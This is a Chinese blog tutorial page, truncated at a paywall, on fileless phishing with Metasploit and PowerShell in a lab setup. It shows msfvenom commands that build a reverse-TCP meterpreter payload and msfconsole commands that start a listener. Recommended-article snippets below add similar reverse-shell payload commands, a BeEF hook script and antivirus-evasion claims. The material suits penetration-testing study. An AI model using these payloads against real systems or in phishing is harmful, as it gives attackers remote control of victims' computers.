MSF&Powershell进行钓鱼攻击

最新推荐文章于 2025-03-09 16:09:25 发布

原创

最新推荐文章于 2025-03-09 16:09:25 发布 · 2.7k 阅读

31 ·

CC 4.0 BY-SA版权

本文介绍如何使用Powershell配合MSF实现无文件攻击，包括生成payload、设置监听、利用word钓鱼等步骤，详细演示了从生成payload到控制靶机的全过程。

一、Powershell配合MSF无文件攻击

实验环境：
靶机：win 7 >192.168.1.9
攻击机：kali>192.168.1.7
web服务器：win 10 > 192.168.1.6
本次实验的大致过程如下:

MSF生成payload并放到靶机能够访问的服务器上，攻击者通过钓鱼等方式使靶机执行powershell代码，靶机反弹到msf监听的端口上建立会话，由此攻击者可以利用此会话完成攻击控制靶机。

实验步骤：

kali生成payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1121 -f psh-reflection >x.ps1

#生成名为x.ps1的windows/x64/meterpreter/reverse_tcp的payload 在这里插入图片描述
2. msf 设置监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 1121
run
# msf开始监听本机1121端口

在这里插入图片描述
3.将生成的payload放到公网服务器，确保靶机能够访问。

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Min1996

关注关注

3
点赞
踩
31

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树（AST）提取

杨秀璋的专栏

03-11

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树（AST）提取。希望这篇文章对您有帮助，也推荐大家去阅读论文，且看且珍惜。

Powershell配合word伪装木马执行

洋洋的小黑屋

03-17

473

环境： win7 64位，word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 放到VPS上，这里我们放到本机搭建的apache环境中 win7中访问木马是否成功打开wo...

1 条评论您还未登录，请先登录后发表或查看评论

MSF&Powershell钓鱼攻击

p01son的博客

06-02

549

Powershell是windows下面非常强大的命令行工具，Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。

谨防钓鱼（二）——msf搭档shellter轻松控制目标电脑

tempulcc的博客

09-15

515

metaspolit配合shellter渗透windows

Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

Alone hackers的博客

03-06

6315

Metasploit (MSF) 使用:包含基本使用，payload生成，后渗透模块使用。

beef结合msf钓鱼

weixin_34174132的博客

03-17

729

Kali linux 系统默认未安装beef，需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1：3000/ui/pannel beef/beef 嵌入代码<script src="Ip:3000/h...

Powershell 配合msf无文件攻击

洋洋的小黑屋

04-27

1854

生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上，这里我们放到本机搭建的apache环境中 kali设置监听，并且启动 win7中访问木马是否成功直接在win7的cmd中执行命令 powersh...

使用powershell Client进行有效钓鱼

aihua002的博客

06-23

1570

Powershell是windows下面非常强大的命令行工具，并且在windows中Powershell可以利用.NET Framework的强大功能，也可以调用windows API，在win7/server 2008以后，powershell已被集成在系统当中。除此之外，使用powershell能很好的bypass各种AV，在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。

msf生成webshell_用metasploit来生成Powershell后门

weixin_39959615的博客

12-22

1422

在Kali的shell中配置一个Powershell后门，针对Windows的Powershell所设计。root@kali:~# msfconsolemsf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_de...

Metasploit - Powershell

Nixawk

11-16

1449

msf post(multi_meterpreter_inject) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ----------

用kali制作一个简单的钓鱼网站

hovcfuti的博客

07-20

5207

在钓鱼网站上输入的用户名和密码会直接显示到kali中，成功得到受害者的账号，这里我没有账号随便输入一个，如果输入的账号是正确的话会直接转跳到真正的网站中，直接无色无味。这时候直接访问自己kali虚拟机的IP，就会访问到一个假的网站，有些小瑕疵哈哈哈，不重要，主要是学习。这时候就可以选择攻击类型，这里我们想要制作一个简单的钓鱼网站，输入1，选择社会工程攻击，回车。输入2，选择网站攻击，回车（英语不好，都靠翻译软件，有些不准确）这时候在生成的钓鱼网站中登录，kali机会监听到一些有趣的东西。

kali钓鱼（超详细）

m0_52934166的博客

08-07

2707

kali钓鱼

PowerShell攻击指南

鸡蛋炒鸡蛋

03-03

6768

什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力，powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境，它内置在每个受支持的windows版本中，使命令行用户和脚本编写者可以利用.NET Framework的强大功能。

生命在于学习——MSF初体验（三）

易水哲的博客

10-27

1740

MSF的笔记记录（三）

MSF 生成静态免杀shell（win）

嘻嘻哈哈

01-26

2886

NO.1 利用工具 msf msf全称 MetasploitFramework，是一个缓冲区溢出测试使用的辅助工具，也可以说是一个漏洞利用和测试平台，它集成了各种平台上常见的溢出漏洞和流行的shellcode，并且不断更新，使得缓冲区溢出测试变的方便和简单。 vc++ c编译器实现过程 1.使用msfvenom生成shellcode msfvenom -

渗透测试常用反弹shell方法(如何渗透测试反弹shell)—Windows篇渗透测试！

资深程序员，曾自学JAVA，C#，如今从业于网安行业

02-08

1027

反弹shell主要就是让我们能远程连接到目标控制台并且下达指令,来达到操控目标资产的目的!正向反弹: 控制端(也就是我们自己的机器)发送请求去连接被控端(目标机器)的方式。不过这种方式会受到防火墙,路由,等各种很多因素影响,很难成功。反向反弹: 被控端主动发送请求连接我们的控制端。这种方法是可以想办法避开防火墙和路由的一些限制的!

【内网渗透】MSF渗透阶段的常用指令笔记

uuzeray的博客

07-09

2165

不需要访问目标主机磁盘，所以也没什么入侵的痕迹。download nimeia.txt /root/Desktop/ # 下载文件到本机上如：download C:\boot.ini /root/或者download C:\"ProgramFiles"\Tencent\QQ\Users\295。run#执行一个已有的模块，这里要说的是输入run后按两下tab，会列出所有的已有的脚本，常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。

木马免杀之MSFVenom制作木马